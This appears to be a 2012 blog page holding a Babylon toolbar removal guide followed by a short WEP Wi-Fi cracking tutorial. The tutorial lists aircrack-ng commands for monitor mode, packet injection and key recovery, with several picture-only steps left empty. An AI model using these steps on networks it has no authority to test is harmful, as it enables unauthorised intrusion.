Monday, December 24, 2012

How to remove Babylon Toolbar

If by chance you ever come by a software that asks you to install babylon toolbar or else if the software forces babylon toolbar on you and if you decide to continue the installation, then probably you are in deep trouble as once installed it will change the default search engine and the homepage of every browser you have on your system. And even so if you change your mind and try to remove this malware by uninstalling it from your system, let me tell you, you won't be able to do that unless you follow these instructions.



How to remove Babylon Toolbar

STEP 1: Uninstall Babylon Toolbar from your computer

Uninstall Babylon and Babylon toolbar for IE from your computer
To uninstall Babylon Toolbar program from your computer,click the Start button, click on Control Panel,the select Uninstall a program. (Add or Remove Programs for Windows XP users)
In the Add or remove programs list search for Babylon program,then double click on it to uninstall it.



STEP 2 : Remove the Babylon Toolbar residual damage from your browser

Remove Babylon Toolbar from Internet Explorer
1. Open Internet Explorer,then click on the gear icon  (Tools for Windows XP users) at the top (far right) and click again on Internet Options.



2. Now in the Internet Options dialog box, click on the Advanced tab, click Reset.



3. In the Reset Internet Explorer settings section. Click Reset again in the information dialog box.





4. When Internet Explorer finishes resetting, click Close in the confirmation dialogue box and then click OK.
5. Close and open Internet Explorer again.


Remove Babylon Toolbar from Mozilla Firefox
1. At the top of the Firefox window, click the Firefox button, go over to the Help sub-menu (on Windows XP, click the Help menu at the top of the Firefox window) and select Troubleshooting Information.



2. Click the Reset Firefox button in the upper-right corner of the Troubleshooting Information page.





3. To continue, click Reset Firefox in the confirmation window that opens.
4. Firefox will close and be reset. When it’s done, a window will list the information that was imported. Click Finish and Firefox will open. That’s it – you’re done!

Or

1. Launch the Firefox browser by clicking "Start," "All Programs," then "Firefox."
2. Click the "Tools" menu located at the top left of the Firefox browser.
3. Click "Add-ons." Click the "Plugins" tab.
4. Scroll down and click "Babylon."
5. Click the "Disable" to disable Babylon from Firefox.
6. Click "Start," then click "Control Panel." Click the "Programs and Features" icon.
7. Scroll down the list of installed programs and click "Babylon." Click "Uninstall."
8. Click "Yes" when asked if you want to remove Babylon from your computer. Click "Finish" to complete the process of removing Babylon from Firefox.


Remove Babylon Toolbar from Google Chrome
1. Remove the  Babylon Toolbar extension from Google Chrome.Open Google Chrome and Click the Chrome menu  on the browser toolbar.Click Tools and then select Extensions.

2. In the Extensions tab,remove (by clicking on the Recycle Bin) the Babylon Translatorplugin and everything related to Babylon.




3. Replace the Babylon search with Google as default search engine.Click the Chrome menu  on the browser toolbar.Select Setttings and click on Manage search engines in the Search section. Select Babylon Toolbar Search from the list and click the X that appears at the end of the row then select Google (Default) from the list and make it your default search engine.






4. Change the Babylon homepage to the default one.Click the Chrome menu  on the browser toolbar and select Settings.

Pick the page you’d like to be your home page in the “Home page” section. You can select to use the New Tab page as your home page. To use another page, click Change once you’ve selected “Show Home button” checkbox. Remove the babylon search page from "On startup" option.



STEP 3: Remove Babylon registry keys with AdwCleaner.
1. You can download AdwCleaner from the below link.
ADWCLEANER DOWNLAOD LINK (This link will automatically download AdwCleaner on your computer)
2. Before starting this utility,close all open programs and internet browsers.
3. Double click on adwcleaner.exe to run the tool.
4. Click on Delete,then confirm each time with Ok



5. Your computer will be rebooted automatically. A text file will open after the restart.

6. NEXT,double click on adwcleaner.exe to run the tool.
7. Click on Uninstall,then confirm with yes to remove this utility from your computer.



STEP 4: Remove Babylon Toolbar files with Malwarebytes Anti-Malware FREE
1. Download the latest official version of Malwarebytes Anti-Malware FREE.
MALWAREBYTES ANTI-MALWARE DOWNLOAD LINK (This link will open a download page in a new window from where you can download Malwarebytes Anti-Malware Free)
2. Start the Malwarebytes’ Anti-Malware installation process by double clicking on mbam-setupfile.
3. When the installation begins, keep following the prompts in order to continue with the setup process. Do not make any changes to default settings and when the program has finished installing, make sure you leave both the Update Malwarebytes’ Anti-Malware and Launch Malwarebytes’ Anti-Malware checked. Then click on the Finish button. If Malwarebytes’ prompts you to reboot, please do not do so.



4. Malwarebytes Anti-Malware will now start and you’ll be prompted to start a trial period , please select ‘Decline‘ as we just want to use the on-demand scanner.




5. On the Scanner tab,select Perform full scan and then click on the Scanbutton to start scanning your computer.




6. Malwarebytes’ Anti-Malware will now start scanning your computer for Babylon Toolbar malicious files as shown below.




7. When the scan is finished a message box will appear, click OK to continue.




8. You will now be presented with a screen showing you the malware infections that Malwarebytes’ Anti-Malware has detected.Please note that the infections found may be different than what is shown in the image.Make sure that everything is Checked (ticked) and click on the Remove Selected button.




9. You will now be presented with a screen showing you the malware infections that Malwarebytes’ Anti-Malware has detected.Please note that the infections found may be different than what is shown in the image.Make sure that everything is Checked (ticked) and click on the Remove Selected button.




Now your system is good to go, the way it was meant to be, free from babylon toolbar.

Hacking WEP WIFI Without Dictionary(Only Pictures)

This tutorial will guide you to penetrate a wireless network protected by WEP key without using a password list/dictionary. This comprehensive guide with 12 simple steps(Pictures Only) can be used on any Linux based system(preferably BackTrack.)

Step 1:
Command Used: iwconfig

Step 2:
Command Used: airmon-ng

Step 3:
Command Used: airmon-ng start wlan0

Step 4:
Command Used: airodump-ng mon0

Step 5:
Command Used: airodump-ng -c 11 - w cracking --bssid [bssid]

Step 6:


Step 7:
Command Used: aireplay-ng -1 0 -a [bssid] mon0

Step 8:
Command Used: aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b [bssid] mon0

Step 9:


Step 10:


Step 11:
Command Used: aircrack-ng cracking-01.cap

Step 12: